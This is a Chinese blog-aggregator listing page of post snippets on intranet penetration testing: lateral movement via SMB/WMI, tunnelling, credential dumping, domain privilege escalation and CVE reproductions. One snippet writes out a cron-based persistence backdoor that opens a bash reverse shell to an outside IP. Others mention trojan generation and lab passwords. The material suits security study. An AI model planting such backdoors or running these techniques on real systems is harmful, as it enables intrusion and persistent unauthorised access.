0X09【内网安全】第4页

内网安全：横向传递攻击（SMB || WMI 明文或 hash 传递）

内网安全：横向传递攻击.横向移动就是在拿下对方一台主机后，以拿下的那台主机作为跳板，对内网的其他主机再进行后面渗透，利用既有的资源尝试获取更多的凭据、更高的权限，一步一步拿下更多的主机，进而达到控制整个内网

半个西瓜.·2023-06-09 22:55

内网安全：内网渗透.（拿到内网主机最高权限 vulntarget 靶场 A）

内网安全：内网渗透.（拿到内网主机最高权限）内网穿透又被称为NAT穿透，内网端口映射外网，在处于使用了NAT设备的私有TCP/IP网络中的主机之间建立连接的问题。

半个西瓜.·2023-06-09 09:26

内网安全：域内信息收集

目录环境搭建域基础知识工作组和域现实背景常规信息收集方式一：操作系统命令执行常用总结方式二：使用CS插件关键信息收集密码抓取测试自动化信息收集工具ADFindBloodHound域分析使用(渗透流程信息)从今天开始，将进入内网渗透的学习环境搭建测试环境：https://pan.baidu.com/s/1L1u8d07zd5fXhdW3p3xf-A?pwd=83k6域基础知识工作组和域工作组是局域网

貌美不及玲珑心，贤妻扶我青云志·2023-06-07 21:06

mysql绕过waf_waf绕过的技巧

*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xxFROM不再重造轮子。Mysqltips1:神奇的`(格式输出表的那个控制符)过空格和一些正则。

weixin_39609503·2023-06-07 18:34

mysql特有的特性绕过_waf绕过：基于mysql特性的waf绕过技巧小总结

*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xxFROM不再重造轮子。Mysqltips1:神奇的`(格式输出表的那个控制符)过空格和一些正则。

weixin_39988888·2023-06-07 18:34

安全认证:

防止非法路由器接入企业内网的ospf路由器，保护内网安全2.认证方式认证方式分为接口认证和区域认证，接口认证和区域认证没有本质的区别，接口认证是当区域内链路过多的情况下，接口认证配置较为繁琐，容易出错，

唔脸喃·2023-06-07 17:54

内网安全：初探隧道技术

目录防火墙必备知识域控-防火墙组策略对象同步域控-防火墙组策略不出网上线MSF上线CS-ICMP上线注意：隧道技术是后渗透手段，是在已经取得权限后的手段域控-组策略同步防火墙必备知识学习防火墙的目标是知道了解防火墙的一些常见配置对内网渗透的影响，并不需要像运维一样全面了解防火墙参考资料：Windows防火墙限制端口/IP/应用访问的方法以及例外的配置这是阿里云关于windows运维的文档，里面有常

貌美不及玲珑心，贤妻扶我青云志·2023-06-07 07:06

内网安全：代理技术详解

目录代理技术实验所用网络拓扑图及说明代理技术SOCK协议使用代理技术的原因正向代理与反向代理实战一：MSF代理通讯实验原理说明一.Meterpreter建立路由二.MSF建立节点三.建立代理到MSF上实战二：CS代理通讯实验原理说明一.CS建立SOCKS代理二.使用proxifier设置代理编辑实战三：CS正向连接上线实验原理说明一.配置监听器，让win10把自己的流量转发到本地的2222端口上二

貌美不及玲珑心，贤妻扶我青云志·2023-06-07 07:06

内网安全：隧道技术详解

目录隧道技术反向连接技术反向连接实验所用网络拓扑图及说明网络说明防火墙限制说明实验前提说明实战一：CS反向连接上线-拿下Win2008一.使用转发代理上线创建监听器二.上传后门执行上线隧道技术-SMB协议SMB协议介绍实战二：SMB协议搭建隧道正向连接-拿下win2012一.生成SMB后门二.横向移动三.上线CS隧道技术-ICMP协议关于ICMP协议ICMP隧道搭建一.靶机TCP流量转发本地端口并

貌美不及玲珑心，贤妻扶我青云志·2023-06-07 07:51

Linux 权限

二、Linux权限0x01Linux用户0x02切换用户命令0x03sudo命令0x04权限的相关概念0x05chmod0x06chown0x07chgrp0x08文件权限值的8进制数值表示方法0x09

@@永恒·2023-06-07 05:21

CVE-2020-1472漏洞实战深度剖析

本文作者：Faith（Ms08067实验室内网安全攻防知识星球）0x00漏洞说明CVE-2020-1472是继MS17010之后一个比较好用的内网提权漏洞，影响WindowsServer2008R2至WindowsServer2019

Ms08067安全实验室·2023-06-07 04:30

内网安全：Cobalt Strike 工具渗透多层内网主机.（正向 || 反向）

内网安全：CobaltStrike工具渗透多层内网主机.CobaltStrike是一款以metasploit为基础的GUI的框架式渗透工具，又被业界人称为CS。

半个西瓜.·2023-06-07 03:15

异或算法——简单实用的数据加密方法

例如我可以构建如下加密机：constintEncodeMachine[10]={0x01,0x02,0x03,0x04,0x05,0x06,0x07,0x08,0x09,

·2023-04-19 12:25

【内网安全-横向移动】基于SMB协议-PsExec

目录一、SMB协议1、简述：2、工具：二、PsExec1、简述：2、使用：1、常用参数：2、情况：3、插件三、PsExec（impacket）1、简述：1、impacket：2、PsExec-impacket1、简述：2、使用：四、MSF1、简述：2、使用：一、SMB协议1、简述：1）SMB(全称是ServerMessageBlock)是一个网络协议名，它能被用于Web连接和客户端与服务器之间的信

黑色地带(崛起)·2023-04-19 08:42

【内网安全-横向移动】IPC$连接---＞计划任务---＞上线

目录一、信息收集（目标&用户&密码）1、简述1、收集信息充当字典2、收集方法二、横向移动1、ipc$2、at命令3、sc命令：4、schtasks(计划任务)三、利用示例1、流程：2、示例：四、工具1、cs插件---LSTAR-Aggressor2、impacket-atexec一、信息收集（目标&用户&密码）1、简述1、收集信息充当字典1）目标字典：域内网络列表2）用户字典：域内用户组列表3）密

黑色地带(崛起)·2023-04-19 08:12

【内网安全-横向移动】WMI-WMIC命令&相关内网工具

目录一、WMI1、简述：1）官方介绍：2）优点：3）条件：4）不足：5）WMIC管理命令：6）相关工具：2、上线：1、wmic2、impacket-wmiexec3、wmicmd.exe4、WMIHACKER一、WMI1、简述：1）官方介绍：WMI具有管理员和WMI提供程序编写器使用的多个命令行工具WMI命令行工具-Win32apps|MicrosoftLearnhttps://learn.mic

黑色地带(崛起)·2023-04-19 08:12

内网安全-隧道技术-防火墙限制协议绕过-文件传输

隧道技术：一种通过使用互联网络基础设施在网络之间传递数据的方式，包括数据封装、传输和解包在内的全过程。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。封装：隧道协议将这些其他协议的数据帧或包重新封装在新的包头中发送。新的包头提供了路由信息，从而使封装的负载数据能够通过互联网络传递传输：被封装的数据包在隧道的两个端点之间通过公共互联网络进行路由。被封装的数据包在公共互联网络上传递时所经过的逻

无名安全·2023-04-17 14:52

【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议

前言：介绍：博主：网络安全领域狂热爱好者（承诺在CSDN永久无偿分享文章）。殊荣：CSDN网络安全领域优质创作者，2022年双十一业务安全保卫战-某厂第一名，某厂特邀数字业务安全研究员，edusrc高白帽，vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。擅长：对于技术、工具、漏洞原理、黑产打击的研究。C站缘：C站的前辈，引领我度过了一个又一个技术的瓶颈期、迷茫期

黑色地带(崛起)·2023-04-17 14:20

内网安全-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务

权限维持-Linux-定时任务-Cron后门利用系统的定时任务功能进行反弹Shell1、编辑后门反弹vim/etc/.backshell.sh#!/bin/bashbash-i>&/dev/tcp/47.94.xx.xx/33330>&1chmod+x/etc/.backshell.sh2、添加定时任务vim/etc/crontab*/1****root/etc/.backshell.sh成功反弹

今天是几号·2023-04-17 08:47

【内网安全】Win&Linux&内存离线读取&Hashcat破解&RDP&SSH存储提取

文章目录概述1、Windows-Mimikatz适用环境：2、Linux-mimipenguin适用环境：Linux-密码获取-内存读取&密文破解&存储凭证Windows-密码获取-在线离线读取&密文破解&存储凭证1、在线读2、离线读3、解决高版本4、HASH破解5、RDP凭据抓取总结概述1、Windows-Mimikatz适用环境：微软为了防止明文密码泄露发布了补丁KB2871997，关闭了Wd

今天是几号·2023-04-13 23:21

【内网安全】横向移动&Linux到Linux&SSH协议&遗留RSA密匙&Jenkins安全

文章目录章节点linux靶场搭建横向移动-Linux靶场-SSH协议&RSA密匙凭证横向移动-Linux靶场-提权&SSH&密匙&Jenkins等1、WebDMZ权限获取2、JenkinsDMZ权限获取3、DatabaseDMZ权限获取章节点IPC，WMI，SMB，PTH，PTK，PTT，SPN，WinRM，WinRS，RDP,Plink，DCOM，SSH，Exchange，LLMNR投毒，NTL

今天是几号·2023-04-13 23:36

【内网安全】横向移动-域渗透之资源约束委派

文章目录前言章节点委派攻击总结横向移动-实战靶机-资源约束委派环境搭建概述条件获取受害目标判断受害用户：增加机器获取sid设置修改属性验证修改是否成功连接目标获取票据导入票据到内存连接利用票据参考前言章节点IPC，WMI，SMB，PTH，PTK，PTT，SPN，WinRM，WinRS，RDP,Plink，DCOM，SSH；Exchange，LLMNR投毒，NTLM-Relay,Kerberos_T

今天是几号·2023-04-09 16:37

IP-Guard功能介绍

IP-guard企业信息监管系统，是一款领先的内网安全软件，它能够协助企业解决最棘手的内网安全问题，借助IP-guard强大的功能，企业能够有效地进行用户行为管理，防范信息外泄，营造健康安全的网络环境，

Chenchen_new·2023-04-08 03:14

IP-guard全部22个功能模块简介

IP-guard企业信息监管系统，是一款领先的内网安全软件，它能够协助企业解决最棘手的内网安全问题，借助IP-guard强大的功能，企业能够有效地进行用户行为管理，防范信息外泄，营造健康安全的网络环境，

Chenchen_new·2023-04-08 03:12

midi usb设备描述符

USBD_CUSTOM_HID_REPORT_DESC_SIZE]__ALIGN_END={/*USERCODEBEGIN0*/0x05,0x01,//USAGE_PAGE(GenericDesktop)0x09,0x00

蜂子阁先生·2023-04-07 17:47

【内网安全】横向移动&非约束委派&约束委派&资源约束委派&数据库攻防

文章目录委派攻击分类：关于约束委派与非约束委派横向移动-原理利用-约束委派&非约束委派非约束委派复现配置如何利用？klistpurge与mimikatzsekurlsa::ticketspurge的区别约束委派(不需要与与域控建立连接)复现配置判断查询利用步骤横向移动-实战靶机-约束委派&数据库攻防攻击域内成员主机-MS17010查找域内非约束委派用户和计算机攻击域内数据库主机-MSSQL+提权方

今天是几号·2023-04-06 04:36

内网安全-域横向批量at&schtasks&impacket

目录0x01横向渗透明文传递1.1渗透流程1.2IPC技术1.3[at]&[schtasks]1.3.1假设已经找到DC的用户名密码（具体后面再详细讲）,由于域控DC是Win2008R2（=Windows2012，需要使用schtasks命令0x02横向渗透明文HASH传递atexec-impacket0x03横向渗透明文HASH传递批量利用-综合3.1websever登录，运行mimikatz，

@Camelus·2023-04-05 19:21

内网安全——域控提权-CVE-2020-1472&NTLM中继攻击

目录（一）横向移动-域控提权-CVE-2020-14720x01漏洞原理0x02利用过程重置密码:恢复密码:

@Camelus·2023-04-05 19:21

第66天-内网安全-域横向批量-at&schtasks&impacket

思维导图环境配置2008r2webserver域内web服务器本地管理员账号密码:.\administraotr:admin!@#45当前机器域用户密码:god\webadmin:admin!@#452003x86fileserver域内文件服务器本地管理员账号密码:administrator:admin当前机器域用户密码:god\fileadmin:Admin123452008r2x64dcgo

IsecNoob·2023-04-05 19:07

【内网安全】横向移动&域控提权&NetLogon&ADCS&PAC&KDC&永恒之蓝

文章目录章节点横向移动-系统漏洞-CVE-2017-0146(永恒之蓝)影响版本插件检测-横向移动CS联动MSF-检测&利用横向移动-域控提权-CVE-2014-6324横向移动-域控提权-CVE-2020-1472影响版本横向移动-域控提权-CVE-2021-42287前提条件影响版本python版本EXP利用过程C#版本EXP利用过程：横向移动-域控提权-CVE-2022-26923概述影响前

今天是几号·2023-04-05 18:00

内网安全（信息收集）

DMZ：中文名称为“隔离区”，也称“非军事化区”。一般在两个防火墙之间DMZ内通常放置一些不含机密信息的公用服务器，比如WEB服务器、E-Mail服务器、FTP服务器等。这样来自外网的访问者只可以访问DMZ中的服务，但不可能接触到存放在内网中的信息等，即使DMZ中服务器受到破坏，也不会对内网中的信息造成影响。DMZ区是信息安全纵深防护体系的第一道屏障，在企事业单位整体信息安全防护体系中具有举足轻重

百密不疏·2023-04-04 18:51

锐捷服务器无线认证配置,【WLAN从入门到精通之对接案例】配置802.1X认证示例_Web（锐捷SAM服务器）...

802.1X认证示例_Web(锐捷SAM服务器)802.1X认证简介802.1X认证是网络接入控制方案(NAC)中的一种，它是基于端口对用户的网络访问权限进行控制的认证方法，通过802.1X认证能够实现保护企业内网安全性的目的

32罗翔说~~~·2023-04-03 10:17

CobalStrike 4.0 生成后门几种方式及主机上线后基础操作

出品｜MS08067实验室（www.ms08067.com）本文作者：BlackCat（Ms08067内网安全小组成员）BlackCat微信（欢迎骚扰交流）：步骤：Attacks—〉Packages—〉

Ms08067安全实验室·2023-04-03 10:13

【内网安全】横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket

文章目录章节点域信息收集-目标&用户&凭据&网络关于ms14-058(CVE-2014-4113)区分135、137、138、139和445端口域横向移动-WMI-自带&命令&套件&插件1.wmic2.cscript3.wmiexec-impacket项目-推荐域横向移动-SMB-自带&命令&套件&插件1.psexec2.smbexec-impacket-推荐3.services-比较麻烦了解即可

今天是几号·2023-04-02 17:10

【牛客刷题专栏】0x09:C数据结构合并两个排序的链表

不僈·2023-03-30 16:30

谈谈对零信任的理解

说起网络安全，我们印象中问题都来自外部攻击，各种安全设备也都是以抵御外部攻击为主，但是内网安全其实也是不可忽视的隐患之一，一些删库没能跑路，还有一些重大的信息泄露事件也在敲打着安全人的警钟。

海狸老先生·2023-03-28 19:48

【内网安全】横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动

文章目录域信息收集-目标&用户&凭据&网络域横向移动-IPC-命令版-AT&schtasks上线配置at=Windows2012(适用于windows2012后的操作系统版本)建立IPC常见的错误代码域横向移动-IPC-插件版-CS&LSTARS域横向移动-IPC-套件版-Impacket-atexec域横向移动-IPC-代理版-Socks&Py&atexec前提条件：已取得webserver服务

今天是几号·2023-03-26 16:28

【BLE】蓝牙自拍杆HID描述符

0x05,0x0C,//UsagePage(Consumer)0x09,0x01,//Usage(ConsumerControl)0xA1,0x01,//Collection0x85,0x02,//ReportID

Engineer_Iven·2023-03-21 06:03

《内网安全攻防.渗透测试实战指南》学习笔记一：内网渗透基础

前言小弟刚接触到内网渗透，该学习笔记上若有不足或错误之处，还请大佬们多多指教呀。一、内网基础知识1、名词解释内网：内网也指**局域网（LocalAreaNetwork，LAN）是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。工作组：在大型单位中，如果计算机不分组的话找起计算机来非

风居住街道0120·2023-03-12 02:30

2020-03-27 搭建docker仓库私服

但这个私服管理功能非常简单，也没有安全控制，通常用于本机镜像私服或公司内网安全区域的私服。

FredWorks·2023-03-11 13:59

CVE-2020-0796永恒之黑漏洞复现

✅作者简介：CSDN内容合伙人、信息安全专业在校大学生系列专栏：内网安全-漏洞复现新人博主：欢迎点赞收藏关注，会回访！舞台再大，你不上台，永远是个观众。平台再好，你不参与，永远是局外人。

就你叫Martin？·2023-02-22 03:16

CVE-2019-0708漏洞复现

✅作者简介：CSDN内容合伙人、信息安全专业在校大学生系列专栏：内网安全-漏洞复现新人博主：欢迎点赞收藏关注，会回访！舞台再大，你不上台，永远是个观众。平台再好，你不参与，永远是局外人。

就你叫Martin？·2023-02-22 03:45

【内网安全】——数据库提权姿势

作者名：白昼安全主页面链接：主页传送门创作初心：一切为了她座右铭：不要让时代的悲哀成为你的悲哀专研方向：web安全，后渗透技术每日emo：在哪能找到解救我的办法模拟环境我们拿到了一个普通用户的权限，在系统溢出漏洞无果的情况下，可以采用数据库进行提权，除了access数据库外，其他数据库基本都存在数据库提权注意：因为access数据库只是一种网页文档的形式，与其他数据库不一样，除此以外还有一些其他的

白昼安全·2023-02-18 19:58

【内网安全】——Linux提权姿势

作者名：白昼安全主页面链接：主页传送门创作初心：一切为了她座右铭：不要让时代的悲哀成为你的悲哀专研方向：web安全，后渗透技术每日emo：希望你在新的一年也能更好，不惧流言蜚语，始终坚定如初一、内核漏洞提权想要利用该漏洞首先要查看内核版本，命令如下uname-a可以看到这里的版本是Linux3.10，此时就可以去网上查找该版本是否存在提权漏洞[1]、在线站点推荐一个在线查找漏洞的站点，链接如下，h

白昼安全·2023-02-18 19:28

【内网安全】——msf木马生成教程

作者名：白昼安全主页面链接：主页传送门创作初心：一切为了她座右铭：不要让时代的悲哀成为你的悲哀专研方向：web安全，后渗透技术每日emo：钱真的是万能的一、msfvenom基本使用1、–p(--payload-options)添加载荷payload。(--payload-options列出payload选项)2、–l查看所有payloadencodernops。3.–f（--help-format

白昼安全·2023-02-04 19:06

【linux】之网络安全

用于保护内网安全的一种设备依据规则进行防护用户定义规则允许或拒绝外部用户访问防火墙分类逻辑上划分，防火墙可以大体分为主机防火墙和网络防火墙主机防火墙：针对于单个主机进行防护网络防火墙：针对网络进行防护，

qq_35302220·2023-01-23 06:21

Markdown数学公式语法速查

文章目录0x01、行内与独行0x02、上标、下标与组合0x03、汉字、字体与格式0x04、占位符0x05、定界符与组合0x06、四则运算0x07、高级运算0x08、逻辑运算0x09、集合运算0x0A、数学符号

陌简宁·2023-01-11 01:18

【内网安全】——Linux信息收集

作者名：Demo不是emo主页面链接：主页传送门创作初心：舞台再大，你不上台，永远是观众，没人会关心你努不努力，摔的痛不痛，他们只会看你最后站在什么位置，然后羡慕或鄙夷座右铭：不要让时代的悲哀成为你的悲哀专研方向：网络安全，数据结构每日emo：遗憾吗？当然我们在获取到webshell之后，经常会遇到Linux的操作系统，这是我们需要对Linux系统本地的敏感资源进行信息收集，下面就是一些有用的信息

Demo不是emo·2022-12-30 19:22

他下班时间写出4本书，2年引导几十万人踏入网络安全行业

出版有《Web安全攻防：渗透实战指南》、《内网安全攻防：渗透实战指南》等技术书，售出合计10万册+，销量长期在信息安全领域前10名。目前运营有6个收费星球，单个星球付费会员1000+。

Ms08067安全实验室·2022-12-29 11:39

杂项个人总结

0x01图片隐写-steghide0x03图片隐写-StegSolve-三原色隐写0x04图片合并0x05坐标生成图片0x06GIF帧分离+图片拼接（动态图片分解）0x07图片修改宽高0x08图片盲水印0x09

天问_Herbert555·2022-12-28 16:16

推荐频道

0X09【内网安全】